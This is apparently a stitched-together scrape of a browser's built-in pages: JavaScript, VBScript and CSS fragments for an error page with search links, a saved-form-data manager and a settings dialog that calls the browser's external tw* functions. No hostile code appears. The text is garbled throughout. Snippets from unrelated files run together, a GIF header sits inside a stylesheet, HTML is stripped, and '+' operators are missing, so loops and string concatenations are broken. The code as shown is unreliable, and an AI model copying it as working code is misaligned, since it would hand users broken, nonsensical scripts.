This.$dom.body.style.overflow = This.$dom.body.parentNode.style.overflow = 'hidden';
for(var i = 0; i < _tag('select').length; i   ) _tag('select')[i].style.visibility = 'hidden';
fx && (This.timer = window.setInterval(function () {
This.fade((This.opacity  = 10) / 100, This.bg);
if(This.opacity >= 20) {
clearInterval(This.timer);
This.fade(0.2, This.bg);
This.fade(0.99);
}, 100));
e = e || this.pane;
e.style.zoom = '1', e.style.filter = 'alpha(opacity='   parseInt(v >= 1 ? '99' : v * 100)   ')';
l && (this.pane.style.left = l   'px'), t && (this.pane.style.top = t   'px'), l == 0 && (this.pane.style.left = '0px'), t == 0 && (this.pane.style.top = '0px');
return (e || document).getElementsByTagName(t);
.white:link {font-size:12px;text-decoration:none;color: #eff8fb}
.white:visited {font-size:12px;text-decoration:none;color: #eff8fb}
.white:active {font-size:12px;text-decoration: none;color: #033B7D}
.white:hover {font-size:12px;text-decoration:none;color: #FF5A00}GIF89a6
A.cb:link {
A.cb:visited {
A.cb:active {
A.cb:hover {
.tlb {
.bb {
.bl {
background:url(callapse.gif) 90% 50% no-repeat;
background:url(callapse_hover.gif) 90% 50% no-repeat;
background:url(expand.gif) 90% 50% no-repeat;
background:url(expand_hover.gif) 90% 50% no-repeat;
var securityId = external.twGetSecurityID(window);
surl = "http://www.google.cn/search?client=aff-worldbrowser&channel=errorpage&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q="   encodeURI( searchtext.value );
window.open( surl );
surl = "http://www.baidu.com/baidu?word=" searchtext.value "&tn=ichuner_4_pg";
surl = "http://www.sogou.com/sogou?query=" searchtext.value "&pid=sogou-addr-6311b2f8bde6a1c3";
Function RequestQueryString( url, ArgName )
= trim(url)
If url = "" Or IsNull(url) Then
If IsObject(parent.location) Then
url = parent.location.href
url = location.href
url = location
nPos = InStr( LCase(url), LCase(ArgName) )
tmpArgVal = right( url, len(url)-nPos 1 )
If InStr( url, "?" ) > 0 Then
ArrTmp = split( url, "?" )
if err.number <> 0 then
err.clear
strUrl = RequestQueryString( url, "url" )
strDomain = RequestQueryString( url, "domain" )
strErrName = RequestQueryString( url, "code" )
document.getElementById("googleSE").value = _neSearchEngine.google;
document.getElementById("baiduSE").value = _neSearchEngine.baidu;
var news = document.getElementById('news');
var frame = document.getElementById("newsFrame");
frame.src = "http://www.fjmjm.com/web/frame_naverror.html";
news.style.display='block';
el.className='a_e';
external.SetOptionValue(securityId,"option","ep_related","1");
news.style.display='none';
el.className='a_c';
external.SetOptionValue(securityId,"option","ep_related","0");
if(document.getElementById("news").currentStyle.display == "block")
this.setDisplay(false,el);
this.setDisplay(true,el);
var defValue = external.GetOptionValue(securityId,"option","ep_related");
this.setDisplay(true,document.getElementById("displayCtrl"));
window.attachEvent("onload",function(){
DisplayMgr.init();
.in1{width: 220px;}
return window.external.twGetFormByIndex( window, "", nIndex );
formName = window.external.twGetFormDataInfo( window, "", formID, dataName );
window.external.twSetFormDataInfo( window, "", formID, "tw_formName", formName );
window.external.twUnInitFormData( window, "", 0 );
pObj = window.event.srcElement;
pObj.style.color=_tabhottextcolor;
pObj.style.color=_tabtextcolor;
oTr = pObj.parentElement.parentElement.parentElement;
oTb = oTr.parentElement.parentElement;
formID = oTr.getAttribute( "tw_formID" );
window.external.twDeleteFormData( window, "", formID );
TalComForm.deleteRow(oTr.rowIndex);
window.location.reload();
oTr = pObj.parentElement.parentElement;
TalUserForm.deleteRow(oTr.rowIndex);
if( moreInfo.style.display == "none" ){
moreInfo.style.display = "";
moreImg.src="more2.gif";
moreInfo.style.display = "none";
moreImg.src="more1.gif";
colInput = formdatatable.getElementsByTagName("input");
nCount = colInput.length;
if( colInput[i].type != "button" )
colInput[i].value = "";
oTr = _oLastSel.parentElement;
if(formID.indexOf("twcommon_")!=-1){
window.external.twFormSave( window, "", formID );
formName = tw_formName.value;
formName = userformName.innerText;
oTr.cells[1].innerText = formName;
oTr = pObj.parentElement;
comDiv.style.display = "";
userDiv.style.display = "none";
tw_formName.value = formName;
window.external.twFormLoad( window, "", formID );
comDiv.style.display = "none";
userDiv.style.display = "";
var oTr = oTb.insertRow( -1 );
var oTd = oTr.insertCell( 0 );
var oTd1 = oTr.insertCell( 1 );
oTr.height = "32px";
oTd.width = "24";
oTd.style.cursor="pointer";
oTd.onclick=OnDeleteItem;
oTd.innerHTML = "
";
oTd1.style.cursor="pointer";
oTd1.onmouseleave=OnLeaveItem;
oTd1.onmouseenter=OnEnterItem;
oTd1.onclick=OnSelectCommonItem;
oTd1.style.color=_tabtextcolor;
oTd1.noWrap = true;
oTd1.innerText=formName;
oTr.setAttribute( "tw_formID", formID );
window.external.twAddComFormData( window, "" );
var nCount = _vCommonData.length;
SelectCommonItem( TalComForm.rows[nCount-1].cells[1] );
if( _oLastSel.parentElement != null )
_oLastSel.parentElement.bgColor = _tabItemDefColor;
_oLastSel.style.fontWeight = "normal";
_oLastSel.style.color = _tabtextcolor;
pObj.parentElement.bgColor = _tabItemSelColor;
pObj.style.fontWeight = "bold";
pObj.style.color = _tabSeltextcolor;
nCount = oTab.rows.length;
oTab.deleteRow(0);
formName = tw_getFormDataInfo( _vCommonData[i].id, "tw_formName" );
OnAddForm(TalComForm, formName, _vCommonData[i].id );
var nCount = _vUserData.length;
var oTr = TalUserForm.insertRow( -1 );
oTd.onclick=OnDeleteUserFormItem;
oTd.innerHTML = "";
oTd1.innerHTML="";
formName = tw_getFormDataInfo( _vUserData[i].id, "tw_formName" );
oTd1.childNodes[0].innerText = formName;
formUrl = tw_getFormDataInfo( _vUserData[i].id, "tw_form_url" );
oTd1.childNodes[0].href = formUrl;
oTr.setAttribute( "tw_formID", _vUserData[i].id );
oTr.bgColor = "#F5F5F5";
_vCommonData.splice( 0, _vCommonData.length );
_vUserData.splice( 0, _vUserData.length );
formObj.id = tw_getFormDataByIndex( nIndex );
if(formObj.id.indexOf("twcommon_")!=-1)
_vCommonData[_vCommonData.length] = formObj;
_vUserData[_vUserData.length] = formObj;
addForm.style.color = _tabtextcolor;
if( _vCommonData.length == 0 ){
if( _vCommonData.length > 0 )
pObj = TalComForm.rows[0].cells[1];
      
 
  
document.write( "" );
var _strLoginInfo="
var _strPassQues="
var _strPass="
var _strPassAnswer="
var _strWeb="
var _strWebSite = "
var _strWebSiteLink = "http://www.fjmjm.com";
var _strPhoenixLink = "http://www.fjmjm.com";
var _strThanksLink = "http://www.fjmjm.com";
Dim g_urlArray( 1024 ):Dim g_nCountVB:g_nCountVB = 0:Function SetArray( nIndex, strItem ):if nIdex < 1024 then:
g_urlArray( nIndex ) = strItem:
end if:End Function:Function OpenAllByVB( ):call window.external.twmutinavigate( window, "", g_urlArray(0), g_nCountVB ):End Function
g_strSecurityId = external.twGetSecurityID( window )
ret = external.twoption( g_strSecurityId, nID, bWrite, g_lValue, g_bstrValue1, g_bstrValue2, g_strArray(0), g_arraySize )
var oNewNode = document.createElement("LI");
header_btn.appendChild(oNewNode);
    • inFrame.document.write( "" );
    inFrame.document.write( "
    " );
    inFrame.document.write( "
    " );
    inFrame.document.write( "
    " );
    inFrame.document.body.leftMargin = 0;
    inFrame.document.body.topMargin = 0;
    inFrame.document.body.rightMargin = 0;
    inFrame.document.body.bottomMargin = 0;
    inFrame.document.body.marginwidth = 0;
    inFrame.document.body.marginheight = 0;
    function InsertInfoItemByHTML( nLine, nChar, nErrCode, strErrMsg, strErrUrl )
    oHint.style.display="none";
    infoTable = inFrame.window.oTa;
    var oTr = infoTable.insertRow( -1 );
    oColl = infoTable.rows;
    if( oColl.length%2 )
    oTr.bgColor = "#FFFFFF";
    oTr.bgColor = "#F4FBFF";
    strLine = strTemp.replace( "$ERR_TEMP", nLine );
    strChar = strTemp.replace( "$ERR_TEMP", nChar );
    strMSG = strTemp.replace( "$ERR_TEMP", strErrMsg );
    strCode = strTemp.replace( "$ERR_TEMP", nErrCode );
    strHTML = _strHTMLString.replace( "$ERR_LINE", strLine );
    strHTML = strHTML.replace( "$ERR_CHAR", strChar );
    strHTML = strHTML.replace( "$ERR_MSG", strMSG );
    strHTML = strHTML.replace( "$ERR_CODE", strCode );
    strHTML = strHTML.replace( "$ERR_URL", strErrUrl );
    oTd.innerHTML = strHTML;
    oTr.scrollIntoView(true);
    document.write( "
    \
    "   _strExit   "
    document.write( "
     "   _strBtnOK   "\
      "   _strBtnCancel   "" );
    optionsTab.tabid = tabid;
    optionsTab.tabname = tabname;
    optionsTab.tabbgcolor = "#FFFFFF";
    optionsTab.tabhotbgcolor = "#CDE3F5";
    optionsTab.tabtextcolor = "#000000";
    optionsTab.tabhottextcolor = "#FF5A00";
    optionsTab.vSubTitleArray = new Array();
    _vOptionTabsArray[_vOptionTabsArray.length] = optionsTab;
    return optionsTab.vSubTitleArray;
    tabSubTitle.titlename = titlename;
    tabSubTitle.titleHelpLink = "";
    tabSubTitle.vIA = new Array();
    if ( arguments.length >= 3 )
    tabSubTitle.titleHelpLink = titleHelpLink;
    vSubTitleArray[vSubTitleArray.length] = tabSubTitle;
    return tabSubTitle.vIA;
    contextItem.itemID = itemID;
    contextItem.itemIndex = -1;
    contextItem.itemType = itemType;
    contextItem.itemText = itemText;
    contextItem.bItemChange = false;
    contextItem.vAA = new Array();
    contextItem.itemCode = "";
    contextItem.itemAfterCode = "";
    contextItem.itemPreCode = "";
    contextItem.itemHelpLink = "";
    if ( arguments.length >= 5 )
    contextItem.itemPreCode = itemPreCode;
    if ( arguments.length >= 6 )
    contextItem.itemAfterCode = itemAfterCode;
    if ( arguments.length >= 7 )
    contextItem.itemCode = itemCode;
    vIA[vIA.length] = contextItem;
    contextItem.itemIndex = _vOIA.length;
    _vOIA[_vOIA.length] = contextItem;
    if ( "ckbedit" == itemType && "" != contextItem.itemCode )
    contextItem.itemCode = contextItem.itemCode.replace( /#IDDEFINE/g, "id=item_edit_"   contextItem.itemIndex );
    return contextItem.itemIndex;
    radioBtn.btnText = btnText;
    radioBtn.btnPreCode = "";
    radioBtn.btnAfterCode = "";
    radioBtn.vAA = new Array();
    radioBtn.btnPreCode = btnPreCode;
    if ( arguments.length >= 4 )
    radioBtn.btnAfterCode = btnAfterCode;
    var nIndex = vRadioArray.length;
    tableList.tableRgnSize = tableRgnSize;
    tableList.tableHeight = tableHeight;
    tableList.vTopBtn = new Array();
    tableList.vBottomBtn = new Array();
    tableList.vHeader = new Array();
    tableList.bHaveCheckBox = bChecked;
    var vHeader = tableList.vHeader;
    oHeader.headerText = headerText;
    oHeader.headerWidth = headerWidth;
    oHeader.bHidden = bHidden;
    oHeader.headerText = "";
    vHeader[ vHeader.length ] = oHeader;
    var vBtn = tableList.vTopBtn;
    vBtn = tableList.vBottomBtn;
    oBtn.btnOpt = btnOpt;
    oBtn.btnText = btnText;
    vBtn[ vBtn.length ] = oBtn;
    for ( var ix = 0; ix < _vOptionTabsArray.length; ix    )
    document.write( "" );
    document.write( "
    " );
    document.write( ""   _vOptionTabsArray[ix].tabname   "" );
    for ( ix = 0; ix < _vOptionTabsArray.length; ix    )
    if ( _SelectTabIndex == _vOptionTabsArray[ix].tabid )
    if ( ix >= _vOptionTabsArray.length )
    _SelectTabIndex = _vOptionTabsArray[0].tabid;
    eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabbgcolor;
    eval( "tabs_table_"   _SelectTabIndex ).style.display = "none";
    eval( "tabs_tr_"   _SelectTabIndex ).bgColor = _vOptionTabsArray[_SelectTabIndex].tabhotbgcolor;
    eval( "tabs_table_"   _SelectTabIndex ).style.display = "";
    divform_context.scrollTop = 0;
    _vOIA[ nIndex ].bItemChange = true;
    for ( var ix = 0; ix < vAA.length; ix    )
    var itemType = _vOIA[ vAA[ix] ].itemType;
    eval( "item_ckb_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_edit_"   vAA[ix] ).disabled = bDisabled;
    oCheckBox.disabled = bDisabled;
    eval( "item_edit_"   vAA[ix] ).disabled = ( oCheckBox.disabled || !oCheckBox.checked );
    eval( "item_edit1_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_edit2_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_btn_"   vAA[ix] ).disabled = bDisabled;
    var vRadioArray = _vOIA[ vAA[ix] ].itemCode;
    for ( var radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )
    eval( "item_radio_"   vAA[ix]   "["   radioIndex   "]" ).disabled = bDisabled;
    eval( "item_list_"   vAA[ix] ).disabled = bDisabled;
    eval( "item_textarea_"   vAA[ix] ).disabled = bDisabled;
    if ( "ckb" == _vOIA[ nIndex ].itemType )
    if ( !eval( "item_ckb_"   nIndex ).disabled )
    bCheck = eval( "item_ckb_"   nIndex ).checked;
    RealDoAssociate( _vOIA[ nIndex ].vAA, !bCheck, bRecursive );
    else if ( "ckbedit" == _vOIA[ nIndex ].itemType )
    eval( "item_edit_"   nIndex ).disabled = !bCheck;
    else if ( "radio" == _vOIA[ nIndex ].itemType )
    var vRadioArray = _vOIA[ nIndex ].itemCode;
    var vAA = vRadioArray[ radioIndex ].vAA;
    if ( !eval( "item_radioid_"   nIndex   radioIndex ).disabled )
    bCheck = eval( "item_radioid_"   nIndex   radioIndex ).checked;
    document.write( "
     "  _vOptionTabsArray[ix].tabname   " " );
    for ( var x = 0; x < _vOptionTabsArray[ix].vSubTitleArray.length; x    )
    if ( "" != _vOptionTabsArray[ix].vSubTitleArray[x].titleHelpLink )
    titleHelp = " ";
    document.write( "
    " );
    vIA = _vOptionTabsArray[ix].vSubTitleArray[x].vIA;
    for ( var y = 0; y < vIA.length; y    )
    var itemEnd = vIA[y].itemAfterCode   "";
    if ( "" != vIA[y].itemHelpLink )
    itemEnd = " "   vIA[y].itemAfterCode   "";
    if ( "ckb" == vIA[y].itemType )
    nRet = DoOption( vIA[y].itemID, false );
    document.write( itemBegin   "
    " );
    document.write( "
    "   _vOptionTabsArray[ix].vSubTitleArray[x].titlename   ""   titleHelp   "
    "   vIA[y].itemPreCode   ""   itemEnd );
    eval( "item_ckb_"   vIA[y].itemIndex ).checked = Boolean( g_lValue );
    eval( "item_ckb_"   vIA[y].itemIndex ).disabled = true;
    else if ( "text" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   vIA[y].itemText   itemEnd );
    else if ( "edit" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   ""   itemEnd );
    eval( "item_edit_"   vIA[y].itemIndex ).value = g_bstrValue1;
    eval( "item_edit_"   vIA[y].itemIndex ).disabled = true;
    else if ( "ckbedit" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   "" );
    if ( vIA[y].itemCode == "" )
    document.write( "" );
    document.write( vIA[y].itemCode );
    document.write( itemEnd );
    else if ( "quickaddr" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   "
    "   vIA[y].itemText   ""   vIA[y].itemCode   "
    "   itemEnd );
    eval( "item_edit1_"   vIA[y].itemIndex ).value = g_bstrValue1;
    eval( "item_edit2_"   vIA[y].itemIndex ).value = g_bstrValue2;
    eval( "item_edit1_"   vIA[y].itemIndex ).disabled = true;
    eval( "item_edit2_"   vIA[y].itemIndex ).disabled = true;
    else if ( "fileselect" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   vIA[y].itemText   " "   itemEnd );
    eval( "item_btn_"   vIA[y].itemIndex ).disabled = true;
    else if ( "radio" == vIA[y].itemType )
    var vRadioArray = vIA[y].itemCode;
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode );
    document.write( vRadioArray[ radioIndex ].btnPreCode   ""   vRadioArray[ radioIndex ].btnAfterCode );
    eval( "item_radio_"   vIA[y].itemIndex   "["   g_lValue   "]" ).checked = true;
    for ( radioIndex = 0; radioIndex < vRadioArray.length; radioIndex    )
    eval( "item_radio_"   vIA[y].itemIndex   "["   radioIndex   "]" ).disabled = true;
    else if ( "list" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   vIA[y].itemText   ""   itemEnd );
    eval( "item_list_"   vIA[y].itemIndex ).selectedIndex = g_lValue;
    eval( "item_list_"   vIA[y].itemIndex ).disabled = true;
    else if ( "btn" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   ""   itemEnd );
    else if ( "textarea" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   ""   itemEnd );
    eval( "item_textarea_"   vIA[y].itemIndex ).value = g_bstrValue1;
    eval( "item_textarea_"   vIA[y].itemIndex ).disabled = true;
    else if ( "gesture" == vIA[y].itemType )
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   "
    " );
    document.write( ""   vIA[y].itemCode   "
    " );
    document.write( "
    " );
    document.write( "
    " );
    gesture_listsel.style.posWidth = 250;
    var arrayID = g_strArray.toArray();
    var arrayImg = g_strArray.toArray();
    var arrayText = g_strArray.toArray();
    document.write( "
    " );
    document.write( "
    " );
    eval( "gesture_seltext_"   arrayIndex ).innerHTML = " "   gesture_listsel.options[wHigh].value;
    document.write( "
    " );
    document.write( "  "   arrayText[arrayIndex]   "
    "   itemEnd );
    else if ( "tablelist" == vIA[y].itemType )
    var tableList = vIA[y].itemCode;
    document.write( itemBegin   "
    		"   vIA[y].itemPreCode   "" );
    document.write( "
    " );
    document.write( "" );
    document.write( "" );
    for ( var headerIndex = vHeader.length - 1; headerIndex >= 0; headerIndex -- )
    if ( !vHeader[ headerIndex ].bHidden )
    vHeader[ nLastNoHiddenHeader ].headerWidth  = 17;
    for ( headerIndex = 0; headerIndex < vHeader.length; headerIndex    )
    document.write( "
    " );
    vHeader[ nLastNoHiddenHeader ].headerWidth -= 17;
    document.write( "
    "   vHeader[ headerIndex ].headerText   "
    " );
    document.write( "
    " );
    if( vIA[y].itemID == 2200 )
    InsertSearchTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
    InsertTableListRow( vIA[y].itemIndex, arrayIndex, g_strArray.getItem( arrayIndex ) );
    document.write( "
    " );
    var vTopBtn = tableList.vTopBtn;
    for ( var btnIndex = 0; btnIndex < vTopBtn.length; btnIndex    )
    document.write( "
    " );
    document.write( "" );
    eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
    eval( "tablelist_"   vTopBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
    document.write( "
    " );
    var vBottomBtn = tableList.vBottomBtn;
    for ( btnIndex = 0; btnIndex < vBottomBtn.length; btnIndex    )
    document.write( "" );
    eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).style.posWidth = 90;
    eval( "tablelist_"   vBottomBtn[btnIndex].btnOpt   "_index"   vIA[y].itemIndex ).disabled = true;
    document.write( "
    "   itemEnd );
    document.write( "
    " );
    for ( var ix = 0; ix < _vOIA.length; ix    )
    var x1 = strItem.search( /:\^:/ );
    strCol = strItem.substr( 0 );
    strCol = strItem.substring( 0, x1 );
    strItem = strItem.substr( x1   3 );
    var searchUrl = varArray[2];
    var searchKey = varArray[3];
    var strTemp = strChecked   ":^:"   searchName   ":^:"   searchKey   ":^:"   searchUrl   ":^:"   searchHome;
    var tableList = _vOIA[ nIndex ].itemCode;
    var oTr = oTable.insertRow( nPos );
    oTr.style.cursor = "default";
    oTr.id = "tablelist_"   nIndex   "_item"   nPos;
    oTr.onclick = OnTableListTrClick;
    for ( var ix = 0; ix < vHeader.length; ix    )
    var oTd = oTr.insertCell();
    if( ix == 0 && tableList.bHaveCheckBox )
    if ( vHeader[ix].bHidden )
    oTd.innerHTML = "";;
    oTd.innerHTML = strCol;
    oTd.width = vHeader[ix].headerWidth;
    oTd.style.wordWrap = "break-word";
    nID = this.id;
    var x1 = nID.search( /_.*_/ )   1;
    var x2 = nID.search( /_item*/ );
    var nIndex = nID.substring( x1, x2 );
    var nItemIndex = nID.substr( x2   5 );
    var nSelect = eval( "tablelist_select_"   nIndex ).value;
    eval( "tablelist_"   nIndex   "_item"   nSelect ).bgColor = "#FFFFFF";
    eval( nID ).bgColor = "#DFF4F8";
    eval( "tablelist_select_"   nIndex ).value = nItemIndex;
    var x1 = nID.search( /_*_/ )   1;
    var x2 = nID.search( /_index*/ );
    var btnOpt = nID.substring( x1, x2 );
    var nIndex = nID.substr( x2   6 );
    if ( -1 != oSelect.value )
    oTable.deleteRow( oSelect.value );
    for ( var ix = 0; ix < oTable.rows.length; ix    )
    oTable.rows( ix ).id = "tablelist_"   nIndex   "_item"   ix;
    if ( 0 == oTable.rows.length )
    oSelect.value = -1;
    else if ( oSelect.value >= oTable.rows.length )
    oSelect.value --;
    eval( "tablelist_"   nIndex   "_item"   oSelect.value ).bgColor = "#DFF4F8";
    if ( -1 != ( Number( oSelect.value ) - 1 ) )
    oTable.moveRow( oSelect.value, Number( oSelect.value ) - 1 );
    oSelect.value = Number( oSelect.value ) - 1;
    if ( Number( oSelect.value )   1 < ( oTable.rows.length ) )
    oTable.moveRow( oSelect.value, Number( oSelect.value )   1 );
    oSelect.value = Number( oSelect.value )   1;
    DoAction( _vOIA[ nIndex ].itemID, 0 );
    if( 2200 == _vOIA[ nIndex ].itemID )//
    InsertSearchTableListRow( nIndex, oTable.rows.length, g_strActionParam );
    InsertTableListRow( nIndex, oTable.rows.length, g_strActionParam );
    var oTr = oTable.rows[ oSelect.value ];
    g_strActionParam = oTr.cells[1].innerText   ":^:";
    var col = oTr.cells[0].getElementsByTagName("input");
    if(col[0].value == "on" )
    g_strActionParam  = oTr.cells[3].innerText;
    g_strActionParam  = oTr.cells[2].innerText;
    for ( var ix = 4; ix < oTr.cells.length; ix    )
    g_strActionParam  = oTr.cells[ix].innerText;
    if ( Number( ix   1 ) != oTr.cells.length )
    for ( var ix = 0; ix < oTr.cells.length; ix    )
    if ( "" == oTr.cells[ix].innerText )
    var col = oTr.cells[ix].getElementsByTagName( "input" );
    g_strActionParam  = col[0].value;
    DoAction( _vOIA[ nIndex ].itemID, 1 );
    InsertSearchTableListRow( nIndex, oSelect.value, g_strActionParam );
    InsertTableListRow( nIndex, oSelect.value, g_strActionParam );
    for ( ix = 0; ix < _vOIA.length; ix    )
    if ( "btn" == _vOIA[ix].itemType )
    if ( _vOIA[ix].bItemChange )
    if ( "ckb" == _vOIA[ix].itemType )
    g_lValue = eval( "item_ckb_"   ix ).checked;
    else if ( "edit" == _vOIA[ix].itemType )
    g_bstrValue1 = eval( "item_edit_"   ix ).value;
    else if ( "ckbedit" == _vOIA[ix].itemType )
    else if ( "quickaddr" == _vOIA[ix].itemType )
    g_bstrValue1 = eval( "item_edit1_"   ix ).value;
    g_bstrValue2 = eval( "item_edit2_"   ix ).value;
    else if ( "fileselect" == _vOIA[ix].itemType )
    else if ( "radio" == _vOIA[ix].itemType )
    var vRadioArray = _vOIA[ix].itemCode;
    if ( eval( "item_radio_"   ix   "["   radioIndex   "]" ).checked )
    else if ( "textarea" == _vOIA[ix].itemType )
    g_bstrValue1 = eval( "item_textarea_"   ix ).value;
    else if ( "list" == _vOIA[ix].itemType )
    g_lValue = eval( "item_list_"   ix ).selectedIndex;
    g_bstrValue1 = eval( "item_list_"   ix ).value;
    else if ( "tablelist" == _vOIA[ix].itemType )
    g_arraySize = oTable.rows.length;
    var oTr = oTable.rows[x];
    if( 2200 == _vOIA[ ix ].itemID )//
    strItem = oTr.cells[1].innerText   ":^:";
    if(col[0].checked == true )
    strItem  = oTr.cells[3].innerText   ":^:";
    strItem  = oTr.cells[2].innerText   ":^:";
    for ( var y = 4; y < oTr.cells.length; y    )
    strItem  = oTr.cells[y].innerText;
    if ( Number( y   1 ) != oTr.cells.length )
    for ( var y = 0; y < oTr.cells.length; y    )
    if ( "" == oTr.cells[y].innerText )
    var col = oTr.cells[y].getElementsByTagName( "input" );
    strItem  = col[0].value;
    var oTr = oTable.rows[0];
    col[0].checked = true;
    else if ( "gesture" == _vOIA[ix].itemType )
    g_arraySize = gesture_table.rows.length;
    var strItem = ( eval( "gesture_id_"   arrayIndex ).value & 0xffff ) | ( ( eval( "gesture_sel_"   arrayIndex ).value & 0xffff ) << 16 )
    DoOption( _vOIA[ix].itemID, true );
    _vOIA[ix].bItemChange = false;
    external.twclosetab( window, "" );
    Call external.twaction( window, nID, nCode, g_strActionParam )
    var _strHelpLink = "http://www.fjmjm.com";
    var _strHelpLinkRoot = "http://www.fjmjm.com/hl/cn/";
    ", "h1.1.htm" );
    ", "h1.2.htm" );
    :8-256)" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 2402, "ckb", "
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 2102, "quickaddr", "Ctrl Enter       ", "
    ", "
    ", "  
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 2103, "quickaddr", "Shift Enter      ", "
    ", "
    ", "  
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 2104, "quickaddr", "Ctrl Shift Enter ", "
    ", "
    ", "  
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 2105, "quickaddr", "Ctrl Alt Enter", "
    ", "
    ", "  
    AddCI( vIA, -1, "text", "
    ", "h2.htm#1" );
    ", "h3.1.htm" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 3302, "ckb", "
    Windows2000
    HTTPS
    _vOIA[_vOIA[nIndex].vAA[0]].vAA[0] = AddCI( vIA, 3303, "radio", "", "
    ", "
    ", vRadioArray );
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 3304, "ckb", "
    nIndex=_vOIA[nIndex].vAA[1];
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 3305, "ckb", "
    ", "h3.2.htm" );
    vRadioArray[2].vAA[0] = AddCI( vIA, 3203, "list", "
    .torrent;.ram)
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 4003, "ckb", "
    ", "h4.htm#1" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 4102, "ckb", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 4103, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 4104, "ckb", "
    ", "h4.htm#2" );
    ", "h4.1.htm" );
    _vOIA[nIndex].vAA[0]=AddCI( vIA, 4403, "edit", "45", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 4402, "textarea", "", "
    ", "
    ", "cols=\"70\" rows=\"12\"" );
    www.fjmjm.com
    _vOIA[nIndex].itemHelpLink = "h5.htm#1";
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 5007, "radio", "", "
    ", "
    ", vRadioArray );
    _vOIA[nIndex].itemHelpLink = "h5.htm#2";
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 5003, "ckb", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 5004, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 5005, "ckb", "
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 5008, "ckb", "
    ", "h5.1.htm" );
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 5203, "fileselect", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 5204, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 5205, "ckb", "
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 5206, "radio", "", "
    ", "
    ", vRadioArray );
       
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 7002, "ckb", "Internet
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 7003, "ckb", "
    _vOIA[nIndex].vAA[2] = AddCI( vIA, 7004, "ckb", "Cookies
    _vOIA[nIndex].vAA[3] = AddCI( vIA, 7005, "ckb", "
    _vOIA[nIndex].vAA[4] = AddCI( vIA, 7006, "ckb", "
    _vOIA[nIndex].vAA[5] = AddCI( vIA, 7007, "ckb", "
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 7100, "ckb", "
    _vOIA[nIndex].vAA[1] = AddCI( vIA, 7102, "btn", "
    ", "h8.htm#1" );
    ", "h8.htm#2" );
    _vOIA[nIndex].itemHelpLink = "h8.htm#3";
    ", "" );
    127.0.0.1:80@HTTP#
    Vista/Windows7
    Windows
    XMLHttpRequest
    _vOIA[nIndex].vAA[0] = AddCI( vIA, 9109, "ckb", "
    a.overflowHide {overflow:hidden;text-overflow:ellipsis;white-space:nowrap; width: 95%;}
    .white:hover {font-size:12px;text-decoration:none;color: #FF5A00}
    .wrap {width:700px;padding-left:40;font-size:12px;}
    .headwrap {width:100%;height:48;overflow:hidden;background-image:url(sztop2.gif);line-height: 40px;background-repeat:repeat-x;}
    .header_l {text-indent:30px;width:309px;font-size:15px;color:#FFFFFF;font-weight:bold;float:left;background-image:url(sztop.gif);background-repeat:no-repeat;}
    .header_r {height:48;float:right;}
    .header_r ul {padding-right:20px;*padding-top:10px;}
    .header_r ul li {float:left;}
    .title_frame {width:100%;overflow:hidden;font-size:12px;font-weight:bold;color:#3399cc;margin-top:16px;}
    .title_l {float:left;}
    .title_r {float:right;font-weight:normal;}
    .title_r A:link {font-size:12px;text-decoration:none;color: #3399cc}
    .title_r A:visited {font-size:12px;text-decoration:none;color: #3399cc}
    .title_r ul li {float:left;padding-left:20px;}
    .separator {width:100%;height:1px;border-top:1px solid #b7d8ed;padding:0;margin:5 0 0 0;}
    #qp_item ul li div a.overflowHide{margin-left:8px;height:16px;overflow:hidden;text-overflow:ellipsis;width:85%;}
    #qp_item .addAddress {margin: 0 0 0 40;}
    #url_item {width:100%;}
    #url_item ul {float:left;width:100%;}
    #url_item ul li {float:left;width:100%;height:32px;}
    #url_item ul li a {;height:16px; margin-left: 8px;}
    #url_item ul li img {height:16px;}
    4-.NW
    //twinfo.htm
    :$ERR_MSG
